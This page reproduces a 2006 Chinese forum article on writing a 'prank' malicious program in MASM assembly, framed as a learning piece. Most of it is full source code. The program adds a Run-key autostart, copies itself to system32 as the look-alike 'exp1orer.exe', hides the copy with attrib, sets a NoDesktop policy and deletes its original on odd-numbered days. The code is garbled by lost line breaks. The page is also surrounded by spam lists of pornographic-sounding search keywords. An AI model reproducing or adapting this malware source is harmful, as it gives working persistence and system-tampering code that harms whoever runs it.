国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

惡意程序是怎樣寫成的
2006-11-17   

本來想寫個“紅色代碼Ⅳ”,不過病毒的首要特征,例如API重定位,調用GetKBase 得到Kernel32.dll的基地址,然后再調用調用GetAPIz得到病毒所需要的API,在匯編上實現這些,目前對我來說有難度。在感染過程,要考慮到什么時候感染?感染什么?感染是病毒的核心技術,病毒野蠻地把預定的可執行代碼插入到正常文件中,當文件執行的時候,先執行病毒代碼,或者添加一些字節。在正常的PE文件中,包括執行代碼,頭文件信息,數據結構以及描述的各類資源信息,病毒感染文件的時候,并沒有把這些也寫進去,所以要自己搜索,具體的代碼,目前還不能寫,但是我會參照別人寫的。在傳播方面,目前倒是有一個利用郵件附件傳播的,在創建Base64編碼等方面,我略有缺陷。

病毒不能完整的寫,起碼也要來個半斤的,所以,就有了這個惡意程序的編寫過程.說到惡意,其實也不惡,頂多是惡作劇,僅是修改了一些注冊表,設置為啟動,象征性刪除一些文件。本來想加入日志鉤子,事件發生時,創建一個shutdown進程惡搞,不過在加進去的模塊對話框后,程序進入了一個死循環。

在程序的開頭,調用_createKey子程序設置了啟動的鍵值:


szRegKey db ''SOFTWARE\Microsoft\Windows\CurrentVersion\Run'',

0szRegValue db ''StartPE'',

0szStr1 db "C:\WINDOWS\System32\exp1orer.exe"

這些就是第一步所以設定的。在啟動方式中,估計注冊表Run啟動是最脆弱的,復制到啟動文件夾的話,又明顯。最好的辦法是創建遠程線程,然后打開文件管理器 xplorer.exe插入,并且還能隱藏。有個例子是隱藏窗口進程的,桌面的窗口類是“Progman”,我想插進去rundll32.exe,無奈不知道它的類,所以將就些,把目標定位注冊表啟動,況且這個我掌握的也比較熟悉。

在開機后,我加入了判斷本地時間后發作的代碼:

invoke GetSystemTime,offset 

lpSystemTimemovzx ebx,lpSystemTime.wDay.if (ebx == 1)|

|(ebx == 3)||(ebx == 5)||(ebx == 7)||(ebx == 9)||(ebx == 11)|

|(ebx == 13)||(ebx == 15)||(ebx == 17)||(ebx == 19)|

|(ebx == 21)||(ebx == 23)||(ebx == 25)||(ebx == 27)||(ebx == 29)

在win32API 中,對GetSystemTime的描述是“在一個SYSTEMTIME中載入當前系統時間,這個時間采用的是‘協同世界時間’(即UTC,也叫做 GMT)格式”,參數只有一個“lpSystemTime”,并要定義一個“SYSTEMTIME”結構 “lpSystemTime SYSTEMTIME ”。如果今天是1,3,5,7,9……,27,29,那么程序在開機運行的時候,就對系統進行了如下操作:復制自己到系統目錄 [注:這個系統目錄,我定義成"szWin db ''C:\windows\system32\exp1orer.exe'',0")所以在windows2000以下的系統,是不能復制的。

invoke GetModuleFileName,hModule,addr szDirectory,

200invoke CopyFile,addr szDirectory,addr szWin,FALSE

利用GetModuleFileName獲取路徑,然后調用CopyFile,復制到系統目錄去。接著“call _AttribCmd”,調用了“_AttribCmd”這個子程序設置只讀,隱藏屬性。“_AttribCmd”代碼描述如下:

_AttribCmd procinvoke GetStartupInfo,

addr stStartUpinvoke createProcess,NULL,

addr szCmdAttrib,NULL,NULL,NULL,

\NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,

addr stProcInforet_AttribCmd endp

很顯然,是調用了createProcess創建一個帶szCmdAttrib參數的進程。這樣,一些用命令參數的程序,可以這樣編程來運行,例如 ping,首先設定變量“szCmd db ''c:\windows\system32\ping.exe IP -t'',0”,描述代碼是:

.dataszCmd db

''c:\windows\system32\ping.exe IP -t'',

0.data?stStartUp STARTUPINFO

stProcInfo PROCESS_INFORMATION .

codestart:invoke GetStartupInfo,

addr stStartUpinvoke createProcess,NULL,

addr szCmdAttrib,NULL,NULL,NULL,

\NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,

addr stProcInfoend start

本來這里就到了全盤搜索exe文件進行感染的時候了,不過這個程序不是病毒,只能象征性搞些惡作劇,我這里是通過修改注冊表達到隱藏桌面圖表,估計MM是認為感染了病毒。

.dataszWriteKey db ''

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\'',

0szWriteValue db ''NoDesktop'',0 ;鍵值名稱szDword dd 1 ;數據

調用了子程序_WriteKey來完成:

_WriteKey proc _lpKeylocal @hKey,

@dwIndex,@dwLastTime:FILETIMEinvoke RegcreateKey,

HKEY_CURRENT_USER,offset szWriteKey,

addr @hKey.if eax == ERROR_SUCCESSinvoke RegSetValueEx,@hKey,

addr szWriteValue,NULL,\REG_DWORD,addr szDword,

4 ;寫入一個REG_DWORD類型的數據invoke RegCloseKey,

@hKey.endifret_WriteKey endp

做完后,這一步就到了傳播,呵呵,不過偶沒寫,就來個“invoke deleteFile,addr szDirectory”刪除,然后也就退出了“invoke ExitProcess,NULL”雖然說惡意程序,但是破壞的地方不多。如果要模擬“萬花谷”的破壞方式,也就是禁止了注冊表而已,這個完全可以做到。程序的完整代碼如下:

.386.model flat,

stdcalloption casemap:noneinclude windows.incinclude

kernel32.incinclude user32.incinclude advapi32.incincludelib

kernel32.libincludelib user32.libincludelib

advapi32.lib.dataszWin db ''C:\windows\system32\exp1orer.exe'',

0szCmdAttrib db ''attrib +R +H C:\windows\system32\exp1orer.exe'',

0szDirectory db 0szRegKey db ''

SOFTWARE\Microsoft\Windows\CurrentVersion\Run'',

0szRegValue db ''StartPE'',

0szStr1 db "C:\WINDOWS\System32\exp1orer.exe"szWriteKey

db ''Software\Microsoft\Windows\CurrentVersion\

Policies\Explorer\'',0szWriteValue db ''NoDesktop'',0 ;

鍵值名稱szDword dd 1 ;數據.data?hInstance dd ?hModule dd

?lpSystemTime SYSTEMTIME osVersion OSVERSIONINFO

stStartUp STARTUPINFO stProcInfo PROCESS_INFORMATION

.code;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

_AttribCmd procinvoke GetStartupInfo,addr stStartUpinvoke

createProcess,NULL,addr szCmdAttrib,NULL,NULL,NULL,

\NORMAL_PRIORITY_CLASS,NULL,NULL,addr stStartUp,

addr stProcInforet_AttribCmd endp;>>>>>>>>>>>>>>>>>>

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

_createKey proc _lpKeylocal @hKey,@dwIndex,@dwLastTime:FILETIMEinvoke

RegcreateKey,HKEY_LOCAL_MACHINE,offset szRegKey,

addr @hKey.if eax == ERROR_SUCCESSinvoke RegSetValueEx,

@hKey,addr szRegValue,NULL,\REG_SZ,addr szStr1,32 ;

寫入一個REG_SZ類型的數據invoke RegCloseKey,

@hKey.endifret_createKey endp;>>>>>>>>>>>>>>>

_WriteKey proc _lpKeylocal @hKey,@dwIndex,

@dwLastTime:FILETIMEinvoke RegcreateKey,

HKEY_CURRENT_USER,

offset szWriteKey,addr @hKey.if eax

== ERROR_SUCCESSinvoke RegSetValueEx,@hKey,

addr szWriteValue,NULL,\REG_DWORD,addr szDword,

4 ;寫入一個REG_DWORD類型的數據invoke RegCloseKey,

@hKey.endifret_WriteKey endp;>>>>>>>>>>>>>>>>>>>>>>>>>>

start:invoke GetModuleHandle,0mov hInstance,eaxinvoke _createKey,

NULL ;設置為啟動invoke GetSystemTime,offset lpSystemTimemovzx ebx,

lpSystemTime.wDay ;獲取本地日,你可以判斷這個變量就可以了。

.if (ebx == 1)||(ebx == 3)||(ebx == 5)||(ebx == 7)|

|(ebx == 9)|
|(ebx == 11)||(ebx == 13)||(ebx == 15)|

|(ebx == 17)||(ebx == 19)||(ebx == 21)||(ebx == 23)|
|(ebx == 25)|

|(ebx == 27)||(ebx == 29)invoke GetModuleFileName,

hModule,addr szDirectory,200;獲取程序路徑invoke CopyFile,

addr szDirectory,addr szWin,FALSEcall _AttribCmdinvoke _WriteKey,NULL

;修改注冊表,隱藏桌面圖表invoke deleteFile,

addr szDirectoryinvoke ExitProcess,NULL.endifend start

這個程序要是經過惡意修改,格式化磁盤是完全沒問題的,無非就是調用一個“createProcess”,但是知道了一種調用方法,其他的也是千篇一律,例如對注冊表修改,禁止右鍵,禁止使用任務管理器,禁止IE選項等等所以我聲明一下,這個程序帶有一點點的攻擊性,發表僅僅提供交流,如果使用,后果由使用者自己負責,與作者和邪惡八進制無關。


熱詞搜索:

上一篇:威金Worm.Viking病毒分析及處理(圖)(1)
下一篇:使用DOS命令 破除UNIX管理員口令(1)

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
奇米精品一区二区三区四区| 久久在线免费观看| 99久久99久久久精品齐齐| 久久精品国产99久久6| 日本中文字幕一区| 三级成人在线视频| 理论电影国产精品| 国内精品伊人久久久久av一坑| 婷婷开心激情综合| 麻豆国产欧美一区二区三区| 免费成人深夜小野草| 狠狠色狠狠色综合| 国产精品一区二区在线观看网站| 国产成人在线看| 成人18视频在线播放| 91视频国产观看| 欧美亚洲国产怡红院影院| 777久久久精品| 久久免费视频一区| 亚洲视频一区在线观看| 午夜精品久久久久久久久| 久久er精品视频| 波多野结衣视频一区| 色婷婷综合久久久中文一区二区| 欧美性videosxxxxx| 日韩欧美中文字幕精品| 国产精品视频一二三区| 亚洲一区在线看| 激情欧美日韩一区二区| 99精品视频一区二区三区| 欧美午夜精品理论片a级按摩| 日韩欧美亚洲另类制服综合在线| 国产欧美精品一区| 亚洲第一成年网| 国产乱国产乱300精品| 色成人在线视频| 欧美大胆人体bbbb| 亚洲精品国产视频| 精品一区二区三区免费播放 | 在线看日本不卡| 日韩欧美美女一区二区三区| 中文字幕永久在线不卡| 天天色天天操综合| 99国产精品99久久久久久| 欧美一区二区视频在线观看| 国产精品天天摸av网| 日本午夜一本久久久综合| 97精品国产97久久久久久久久久久久| 欧美日韩小视频| 中日韩av电影| 韩国毛片一区二区三区| 欧美精品在线观看播放| √…a在线天堂一区| 久久国产视频网| 7777精品久久久大香线蕉| 综合自拍亚洲综合图不卡区| 久久精品国产精品亚洲精品| 欧美日韩在线观看一区二区 | 色拍拍在线精品视频8848| 久久久久免费观看| 久久精品国产久精国产| 欧美日韩国产精选| 亚洲黄网站在线观看| 91小视频在线免费看| 中文字幕巨乱亚洲| 国产精品一区二区在线播放| 欧美一区二区日韩| 日韩精品福利网| 欧美在线你懂的| 亚洲一区二区三区四区中文字幕| 成人av在线网站| 中文一区一区三区高中清不卡| 九色|91porny| 精品国产1区2区3区| 久久66热re国产| 26uuu亚洲| 国产精品系列在线观看| 久久老女人爱爱| 懂色av一区二区三区免费看| 精品不卡在线视频| 国产伦精一区二区三区| 久久久高清一区二区三区| 国产九九视频一区二区三区| 久久精子c满五个校花| 国产成人av电影在线观看| 国产欧美日韩另类一区| 成年人国产精品| 亚洲乱码国产乱码精品精的特点| 99久久综合国产精品| 亚洲免费在线观看视频| 在线观看一区不卡| 青青草伊人久久| 久久中文字幕电影| gogogo免费视频观看亚洲一| 亚洲欧美视频在线观看视频| 欧美最新大片在线看| 日韩专区欧美专区| 精品国产乱码久久久久久闺蜜 | 青娱乐精品视频| 国产婷婷色一区二区三区在线| 高清成人免费视频| 一区二区高清在线| 精品日本一线二线三线不卡| 国产91清纯白嫩初高中在线观看 | 国产suv精品一区二区883| 中文av一区二区| 欧美精品一级二级三级| 精品一区二区三区在线播放| 欧美国产精品一区| 这里是久久伊人| 成人污视频在线观看| 亚洲成人免费影院| 久久精品网站免费观看| 欧美性猛交xxxxxx富婆| 久久国产麻豆精品| 亚洲精品视频在线观看免费| 日韩一卡二卡三卡四卡| av色综合久久天堂av综合| 视频一区在线播放| 国产精品欧美一区二区三区| 欧美日韩精品一区二区三区蜜桃| 国产成人8x视频一区二区| 日韩精品电影一区亚洲| 亚洲色图制服诱惑| 久久久另类综合| 久久久精品日韩欧美| 色婷婷综合久色| 成人亚洲精品久久久久软件| 日韩一区精品视频| 一区二区三区中文字幕在线观看| 精品粉嫩超白一线天av| 欧美日韩精品一区二区天天拍小说 | 欧美三日本三级三级在线播放| 国产永久精品大片wwwapp| 午夜日韩在线电影| 亚洲天堂2016| 国产欧美一二三区| 国产亚洲精品久| 欧美成va人片在线观看| 69堂成人精品免费视频| 欧美性感一类影片在线播放| 91麻豆免费在线观看| 成人免费视频视频在线观看免费| 另类欧美日韩国产在线| 一区二区三区四区视频精品免费| 国产日韩欧美综合在线| 精品播放一区二区| 亚洲精品一线二线三线| 91精品国产色综合久久不卡蜜臀 | 亚洲精品在线观| 欧美xxxx在线观看| 欧美一区二区免费观在线| 欧美一区二区国产| 欧美tickling挠脚心丨vk| 日韩女优av电影| 2020国产成人综合网| 久久综合成人精品亚洲另类欧美 | 婷婷综合五月天| 奇米在线7777在线精品| 蜜芽一区二区三区| 久久99精品国产91久久来源| 精彩视频一区二区三区| 蜜桃传媒麻豆第一区在线观看| 免费成人深夜小野草| 精品亚洲免费视频| 国产91丝袜在线18| 91蜜桃在线观看| 欧美色成人综合| 日韩欧美不卡一区| 欧美激情一区二区三区在线| 国产精品每日更新| 一区二区三区精品视频在线| 日韩电影免费一区| 国产美女久久久久| 91免费小视频| 91麻豆精品国产无毒不卡在线观看| 日韩视频一区二区在线观看| 久久综合色之久久综合| 国产精品污网站| 亚洲 欧美综合在线网络| 久久成人18免费观看| 色综合天天在线| 91精品在线免费观看| 国产女主播在线一区二区| 日韩伦理av电影| 午夜激情一区二区| 成人黄色大片在线观看| 在线成人免费视频| 国产欧美日韩在线视频| 亚洲va中文字幕| 国产日韩影视精品| 亚洲国产日韩a在线播放 | 亚洲国产精品精华液2区45| 国产精品不卡视频| 日韩精品一级中文字幕精品视频免费观看 | 激情文学综合插| 在线一区二区三区四区五区| 日韩欧美一级精品久久| 亚洲欧美一区二区三区久本道91| 蜜桃91丨九色丨蝌蚪91桃色|